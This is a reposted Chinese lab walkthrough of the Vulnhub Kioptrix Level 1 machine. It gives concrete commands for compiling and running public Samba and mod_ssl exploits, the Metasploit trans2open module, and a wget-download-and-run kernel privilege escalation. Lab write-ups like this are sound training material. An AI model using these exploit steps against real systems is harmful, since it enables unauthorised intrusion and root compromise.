Lab 1-Vulnhub - Kioptix Level 1

这篇具有很好参考价值的文章主要介绍了Lab 1-Vulnhub - Kioptix Level 1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Vulnhub - Kioptix Level 1

一、前言

简介:

Vulnhub是一个提供各种漏洞环境的靶场平台。

下载地址:

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

网络问题:

症状:

1、将靶机网络适配器修改为NAT模式后启动靶机,使用nmap对网段进行扫描会发现扫描不到靶机IP地址。

解决方法:

1、将靶机在VMware中移除。

2、以记事本打开此文件。

3、删除所有以 "ethernet0" 开头的条目并保存更改。

4、 然后重新导入虚拟机,并重新添加虚拟网络适配器且将其网络模式设置为NAT模式。

5、开启虚拟机,并重新使用nmap对网段进行扫描

参考:

https://www.cnblogs.com/jason-huawen/p/16097208.html

靶场环境:

Kali IP:192.168.8.128

靶机 IP:192.168.8.129

网络适配器模式:NAT

二、Walkthrough

1、首先使用 nmap -sP 参数对网段进行扫描,扫描出靶机IP。

2、扫描出IP后使用 nmap -sV 参数对靶机进行服务和版本探测。

3、到这里后有几个思路,对开放端口进行深入信息收集。可以对80和443端口进行访问,看是否可以收集更多信息。(例如:CMS类型和版本、Web服务器类型和版本、操作系统类型和版本、目录扫描、robots.txt文件),如果CMS版本有历史漏洞可以尝试从该点切入。

Samba

由于Samba的版本nmap没有扫描出来,这里使用 msfconsole 命令启动MSF,使用MSF自带的smb_version进行搜索。

搜索到该模块后使用 use +序号 进行使用模块(这里是 use0 ),在使用该模块后使用 show options 命令查看该模块需要设置的功能点,这里发现RHOSTS 没有设置,将RHOSTS设置为靶机IP地址后,再次使用命令查看是否存在还需要设置的功能点,这里发现已经设置好了直接使用 run 命令使用模块,Samba版本为 2.2.1a

已知Samba版本使用searchsploit samba搜索到所有包含Samba的exp,这里使用可以远程命令执行的(网上搜的)。

Samba Remote Code Execution(RCE)

exp 文件路径为/usr/share/exploitdb/exploits/multiple/remote/10.c 使用cp命令将exp复制到合适的位置,我这里是复制到了/opt/exp文件夹下(需要使用root权限启动终端)。

使用gcc 10.c -o samba_exp命令编译exp(-o 是输出,后面的是输出的文件名),编译完成后使用chmod u+x命令为用户添加执行权限。

使用./samba_exp -b0 IP地址 命令启动(-b 参数是platform,0为Linux),启动成功后成功getshell。

Samba trans2open

在互联网中查找资料后得知还有这种利用方式,而且msf中已经集成了该模块,直接启动msfconsole,使用命令搜索。

搜索出来后直接使用 use 命令来使用并且设置LHOST、RHOSTS、Payload,但是这里遇到一个问题就是有时候会不成功,同一台Kali的另一个msfconsole窗口就可以成功获取shell。

在另一个窗口中成功getshell,这里已经是root权限不需要提权。

rpcbind

111端口为rpcbind服务,该服务存在漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上任意大小的内存(每次攻击最高可达4GB),除非进程崩溃或者管理员挂起/重启rpcbind服务,否则该内存不会被释放)。

nmap扫描已知版本为 rpcbind 2 ,启动MSF 使用searchsploit命令看漏洞库中是否存在该漏洞。

1、使用msf自带的的模块扫描rpcbind,命令为

use auxiliary/scanner/misc/sunrpc_portmapper,设置 RHOSTS后直接run

2、由于没找到什么有用信息,这里使用 searchsploit rpcbind命令搜索一下发现搜索到了三个Exp,把这三个Exp都复制下来后挨个使用发现都没有作用。

26887.rb

41974.rb

20376.txt

里面的网址也都不能访问,所以rpcbind这条路作罢。

mod_ssl

由于nmap在信息收集的过程中收集到了mod_ssl的版本为2.8.4 ,这里使用命令searchsploit mod_ssl 2.8搜索Exp,复制搜索到的Exp到本地进行编译。

21671.c和764.c编译失败

47080.c

首先使用命令gcc 47080.c -o 47080进行编译发现编译失败,一番搜索后在后面添加参数 -lcrypto后编译成功,完整命令如下:

gcc 47080.c -o 47080 -lcrypto

使用命令./47080启动编译后的软件给我们了使用方法,在前期信息收集时可以得知操作系统为Redhat Linux Apache的版本为1.3.20

这里使用以下命令成功拿到低权限Shell,但是不知道为什么使用0x6a不成功。

./47080 0x6b 192.168.8.129(IP地址) 443 -c 50

后面就要考虑提权的问题了,提权的方法有很多,这里使用Linux内核漏洞提权,上面拿到低权限shell后使用uname -a命令查看内核版本。

直接搜索Exp并复制到/opt/exp目录下。

使用 python3 -m http.server 命令开开启HTTP服务。

在低权限shell中使用wget 192.168.8.128:8000/3.c 命令下载到靶机中,并使用gcc 3.c -o exp命令编译,编译后使用命令./exp启动,到这里提权成功。

三、总结

1、网络发现可以用netdiscover工具来找到靶机IP。

2、samba扫描工具可以使用以下几个文章来源地址https://www.toymoban.com/news/detail-772797.html

1、msf中的smb_version
2、enum4linux

到了这里,关于Lab 1-Vulnhub - Kioptix Level 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【pen200-lab】10.11.1.73

    【pen200-lab】10.11.1.73 🔥系列专栏:pen200-lab 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年11月27日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢!

    2024年02月07日
    浏览(31)
  • 【pen200-lab】10.11.1.31

    【pen200-lab】10.11.1.31 🔥系列专栏:pen200-lab 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年12月7日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢!

    2024年02月04日
    浏览(37)
  • VulnHub靶场渗透实战11-Billu_b0x

    kali:192.168.3.9 桥接模式。 靶机:192.168.3.12 桥接模式(nat模式也可以,我桥接是为了方便我物理机的浏览器访问) 1.arp扫描(也可用nmapC段发现),主机发现。 获取的靶机IP地址是:192.168.3.12。  2.扫描开启的端口和服务。  访问一下80端口开放的web页面。  2.看这页面可能存在

    2024年02月01日
    浏览(37)
  • 【pen200-lab】10.11.1.21(实际获得22权限)

    【pen200-lab】10.11.1.21 🔥系列专栏:pen200-lab 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年11月27日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢!

    2024年02月04日
    浏览(40)
  • 操作系统实验 2.3系统调用:linux-0.11-lab “为版本0内核增加一个系统调用getjiffies” 和 “在用户程序中使用新增的系统调用”

    打开 vscode ,在如图所示位置打开 ~/os/linux-0.11-lab/0 文件夹 1.定义getjiffies系统调用 题目中给的提示:进入到 unistd.h 文件中 阅读代码,可以发现上图划线处有个系统调用名为 getpid :返回当前进程号——这与我们期望实现的功能类似:通过系统调用返回jiffies值。 于是此时希望

    2023年04月08日
    浏览(97)
  • DirectX11 简介+环境配置

    DX11是Win7的产物,它是09年发布的,可谓是非常古老。那么为什么我们还要学习呢?这是为了给下一步的DX12做准备。 如果你是Win10用户,且安装了Windows 10 SDK可以跳至 链接库。此节主要是为了Win7及以下的用户,但我手头只有Win10,只是拿来演示一下,内容大致差不多。 你可以

    2024年02月04日
    浏览(30)
  • WLAN/Wifi802.11协议简介

    Wifi是基于IEEE 802.11协议的标准wifi WLAN具有多种协议,比如IEEE802.11 [工作频段] 将频率分为多段,如2.4G(2401~2423Mhz)/5G(6Ghz以下) [无线信道] 将频段分为多个信道,信道主要用于传输无线电波信号的通道 [信道带宽] 带宽越大(常见20/40/80/160),数据传输速率越大 标准 频段 速率 带宽

    2024年02月05日
    浏览(39)
  • Oracle之 第1篇 Oracle 11g 简介

    目录 Oracle之 第1篇   Oracle 11g 简介 1.1  Oracle概述 1.2  Oracle 11g 系统的体系结构★ 1.1 Oracle物理结构 1.1物理结构--数据文件 1.1.2 物理结构---日志文件 1.1.3 物理结构---控制文件 1.2.4  配置文件 常用 Oracle 服务   (上机时需要启动三个服务) 常用 Oracle 服务(重点) OracleServiceO

    2024年01月23日
    浏览(47)
  • 【C++11】简介、列表初始化、声明、范围for、STL中的一些变化

    在2003年C++标准委员会曾经提交了一份技术勘误表(简称TC1),使得C++03这个名字已经取代了C++98称为C++11之前的最新C++标准名称。不过由于C++03(TC1)主要是对C++98标准中的漏洞进行修复,语言的核心部分则没有改动,因此人们习惯性的把两个标准合并称为C++98/03标准。 从C++0x到C++1

    2024年02月01日
    浏览(59)
  • 【11】STM32·HAL库开发-STM32CubeMX简介、安装 | 新建STM32CubeMX工程步骤

      STM32CubeMX是ST开发的一款图形配置工具,可通过配置自动生成 初始化代码 (并不包括逻辑代码)。以下是STM32CubeMX官方宣传图片,适用于Windows和macOS系统,用于生成初始化代码,一个图形配置工具,搭配不同系列的STM32Cube固件包,即可支持不同系列的STM32芯片,初始化代码

    2024年02月17日
    浏览(59)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包